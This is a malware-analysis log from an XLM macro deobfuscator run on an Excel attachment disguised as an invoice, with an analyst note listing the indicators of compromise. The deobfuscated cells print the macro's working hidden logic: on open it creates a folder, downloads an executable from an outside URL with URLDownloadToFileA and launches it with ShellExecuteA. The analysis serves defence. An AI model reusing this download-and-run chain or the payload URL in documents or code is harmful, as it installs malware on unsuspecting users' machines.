  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\infoinvoice_865092.xls\infoinvoice_865092.xlsm
  22.  
  23. [Loading Cells]
  24. auto_open: auto_openypcgg->wshCsjwHppdPqNZn!$GP$756
  25. [Starting Deobfuscation]
  26. CELL:GP756 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BT520)
  27. CELL:BT520 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GC64)
  28. CELL:GC64 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FS971)
  29. CELL:FS971 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1775)
  30. CELL:BD1775 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IG1897)
  31. CELL:IG1897 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW548)
  32. CELL:HW548 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EN777)
  33. CELL:EN777 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DV981)
  34. CELL:DV981 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HV1440)
  35. CELL:HV1440 , FullEvaluation , RUN(wshCsjwHppdPqNZn!T868)
  36. CELL:T868 , FullEvaluation , RUN(wshCsjwHppdPqNZn!V208)
  37. CELL:V208 , FullEvaluation , RUN(wshCsjwHppdPqNZn!L526)
  38. CELL:L526 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ963)
  39. CELL:CJ963 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FE1891)
  40. CELL:FE1891 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HQ886)
  41. CELL:HQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1823)
  42. CELL:EE1823 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CY1593)
  43. CELL:CY1593 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HL781)
  44. CELL:HL781 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO617)
  45. CELL:FO617 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DL1624)
  46. CELL:DL1624 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DU1273)
  47. CELL:DU1273 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IJ745)
  48. CELL:IJ745 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CB1708)
  49. CELL:CB1708 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Q480)
  50. CELL:Q480 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU1272)
  51. CELL:CU1272 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO259)
  52. CELL:FO259 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EX1078)
  53. CELL:EX1078 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FX1220)
  54. CELL:FX1220 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EO79)
  55. CELL:EO79 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX12)
  56. CELL:AX12 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AF1326)
  57. CELL:AF1326 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AA114)
  58. CELL:AA114 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK307)
  59. CELL:AK307 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CH1827)
  60. CELL:CH1827 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CT1937)
  61. CELL:CT1937 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EI965)
  62. CELL:EI965 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW1333)
  63. CELL:HW1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1376)
  64. CELL:HE1376 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GQ1438)
  65. CELL:GQ1438 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW56)
  66. CELL:HW56 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD367)
  67. CELL:BD367 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1786)
  68. CELL:EE1786 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1602)
  69. CELL:HE1602 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DI1984)
  70. CELL:DI1984 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HR1943)
  71. CELL:HR1943 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM1075)
  72. CELL:AM1075 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BM1289)
  73. CELL:BM1289 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1485)
  74. CELL:BD1485 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HP1465)
  75. CELL:HP1465 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DB1717)
  76. CELL:DB1717 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EQ1322)
  77. CELL:EQ1322 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AZ1191)
  78. CELL:AZ1191 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK500)
  79. CELL:AK500 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HM1754)
  80. CELL:HM1754 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BO420)
  81. CELL:BO420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!C387)
  82. CELL:C387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CG1648)
  83. CELL:CG1648 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CV1)
  84. CELL:CV1 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CQ886)
  85. CELL:CQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ10)
  86. CELL:CJ10 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CA140)
  87. CELL:CA140 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BR215)
  88. CELL:BR215 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Z1977)
  89. CELL:Z1977 , FullEvaluation , RUN(wshCsjwHppdPqNZn!K1522)
  90. CELL:K1522 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FY283)
  91. CELL:FY283 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DW1579)
  92. CELL:DW1579 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GV611)
  93. CELL:GV611 , FullEvaluation , RUN(wshCsjwHppdPqNZn!II1071)
  94. CELL:II1071 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IK335)
  95. CELL:IK335 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EM1429)
  96. CELL:EM1429 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1822)
  97. CELL:HT1822 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IN226)
  98. CELL:IN227 , FullEvaluation , RUN(wshCsjwHppdPqNZn!R1386)
  99. CELL:R1386 , FullEvaluation , FORMULA("https://theartistry.co/opengate/readme.php",$BB$54)
  100. CELL:R1387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BS1705)
  101. CELL:BS1706 , FullEvaluation , RUN(wshCsjwHppdPqNZn!X1283)
  102. CELL:X1283 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$FV$10)
  103. CELL:X1284 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GD419)
  104. CELL:GD420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BG360)
  105. CELL:BG360 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$DO$1389)
  106. CELL:BG361 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DN1014)
  107. CELL:DN1015 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AV667)
  108. CELL:AV667 , FullEvaluation , FORMULA("URLMON",$FG$502)
  109. CELL:AV668 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EP1493)
  110. CELL:EP1494 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FL1071)
  111. CELL:FL1071 , FullEvaluation , FORMULA("URLDownloadToFileA",$GZ$1642)
  112. CELL:FL1072 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GF1117)
  113. CELL:GF1118 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GJ727)
  114. CELL:GJ727 , FullEvaluation , FORMULA("JJCCJJ",$FQ$216)
  115. CELL:GJ728 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HU1332)
  116. CELL:HU1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BZ651)
  117. CELL:BZ651 , FullEvaluation , FORMULA("Shell32",$AF$553)
  118. CELL:BZ652 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GG313)
  119. CELL:GG314 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AW466)
  120. CELL:AW466 , FullEvaluation , FORMULA("ShellExecuteA",$IO$1263)
  121. CELL:AW467 , FullEvaluation , RUN(wshCsjwHppdPqNZn!W991)
  122. CELL:W992 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU864)
  123. CELL:CU864 , FullEvaluation , FORMULA("JJCCCCJ",$FU$70)
  124. CELL:CU865 , FullEvaluation , RUN(wshCsjwHppdPqNZn!ES194)
  125. CELL:ES195 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AY736)
  126. CELL:AY736 , FullEvaluation , FORMULA("Open",$GO$1633)
  127. CELL:AY737 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HB625)
  128. CELL:HB626 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CE241)
  129. CELL:CE241 , FullEvaluation , FORMULA("regsvr32.exe",$F$470)
  130. CELL:CE242 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DH1652)
  131. CELL:DH1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM496)
  132. CELL:AM496 , FullEvaluation , FORMULA("rundll32.exe",$FT$1531)
  133. CELL:AM497 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EW329)
  134. CELL:EW330 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IO305)
  135. CELL:IO305 , FullEvaluation , FORMULA("C:\YHGtfHd",$AK$1197)
  136. CELL:IO306 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1875)
  137. CELL:HT1876 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AO672)
  138. CELL:AO672 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT",$AB$1242)
  139. CELL:AO673 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FC1296)
  140. CELL:FC1297 , FullEvaluation , RUN(wshCsjwHppdPqNZn!O536)
  141. CELL:O536 , FullEvaluation , FORMULA("Kernel32",$GA$40)
  142. CELL:O537 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HN1652)
  143. CELL:HN1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX1977)
  144. CELL:AX1977 , FullEvaluation , FORMULA("CreateDirectoryA",$FY$218)
  145. CELL:AX1978 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DM1240)
  146. CELL:DM1241 , FullEvaluation , RUN(wshCsjwHppdPqNZn!A1442)
  147. CELL:A1442 , FullEvaluation , FORMULA("JCJ",$BS$1104)
  148. CELL:A1443 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1823)
  149. CELL:HT1823 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd",0)
  150. CELL:HT1824 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd\pElDosT",0)
  151. CELL:HT1826 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://theartistry.co/opengate/readme.php","C:\YHGtfHd\pElDosT\OJxSJzN.exe",0,0)
  152. CELL:HT1827 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\YHGtfHd\pElDosT\OJxSJzN.exe",,0,0)
  153. CELL:HT1830 , End , HALT()
  154. [END of Deobfuscation]
  Analyst note: the resolved CALL chain (HT1823–HT1827) creates C:\YHGtfHd\pElDosT via Kernel32!CreateDirectoryA, downloads https://theartistry.co/opengate/readme.php to C:\YHGtfHd\pElDosT\OJxSJzN.exe via URLMON!URLDownloadToFileA, and launches that file with Shell32!ShellExecuteA("Open"), then HALT()s — i.e. a classic XLM download-and-execute. The URL, the drop directory and the dropped filename are the usable IOCs. The "regsvr32.exe" and "rundll32.exe" strings written by FORMULA (CE241, AM496) are not referenced by any of the final CALLs in this run, so treat them as unused/alternate branches or decoys rather than confirmed behaviour. Emulated output only: the server response and the dropped binary were not inspected here, so the second-stage payload is unknown.
  155. time elapsed: 2.229518175125122